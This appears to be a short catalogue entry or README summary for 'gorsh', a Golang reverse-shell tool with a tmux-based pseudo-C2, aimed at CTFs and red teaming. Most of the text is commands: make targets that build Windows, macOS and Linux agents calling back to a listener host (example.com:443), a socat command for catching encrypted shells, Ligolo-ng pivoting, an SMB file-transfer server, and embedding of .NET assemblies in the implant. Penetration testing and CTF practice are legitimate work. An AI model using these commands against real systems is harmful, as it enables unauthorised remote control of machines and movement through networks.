gorsh is a Golang-based reverse shell designed for CTFs, featuring a tmux-driven pseudo-C2 interface to manage multiple sessions efficiently.
A toy CTF Golang Reverse Shell w/ a Tmux-driven pseudo-C2 Interface
This tool is primarily used by penetration testers and red teamers to establish and manage reverse shell connections during engagements or CTF challenges. It facilitates multi-session management via tmux, supports advanced payload execution, and enables network pivoting through embedded Ligolo-ng tunnels.
This tool is optimized for CTFs and ease of use rather than stealth or advanced tradecraft. Users should have tmux installed for the best experience managing multiple shells. File transfers require setting up the included SMB server due to the reverse shell's stdin/stdout limitations. Windows-specific features require administrative privileges for full functionality. Proper certificate setup is needed if using socat for encrypted shell catching.
Set environment variables LHOST and LPORT for your listener host and port
Run `make windows LHOST=example.com LPORT=443` to generate Windows agent
Run `make macos LHOST=example.com LPORT=443` to generate macOS agent
Run `make linux LHOST=example.com LPORT=443` to generate Linux agent
Run `make server LPORT=443` to build the server binary
Run `make all LHOST=example.com LPORT=443` to build all components
Use `make listen LPORT=443` to start listening for incoming shells
Optionally run `make start-smb` to start the SMB server for file transfers
Use `make smblogs` to monitor SMB server logs
`make {windows,macos,linux} LHOST=example.com LPORT=443`: Generate platform-specific reverse shell agents with specified listener host and port
`make server LPORT=443`: Build the server binary listening on the specified port
`make all LHOST=example.com LPORT=443`: Build all agents and server binaries with given host and port
`make listen LPORT=443`: Start the server to catch incoming reverse shells on the specified port
`socat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE`: Alternative method to catch shells without using gorsh-server or tmux
`make start-ligolo`: Prepare interfaces and run Ligolo-ng for socks-less pivoting tunnels
`pivot`: Run from an agent to initiate a callback to the Ligolo-ng interface for routing
`make start-smb`: Start the SMB server to enable file upload/download bridging
`make smblogs`: View logs of SMB server activity to monitor callbacks
`make list-assemblies`: List available gzipped assemblies from SharpCollection for embedding
`make choose-assemblies`: Interactively select assemblies to embed in the implant using fzf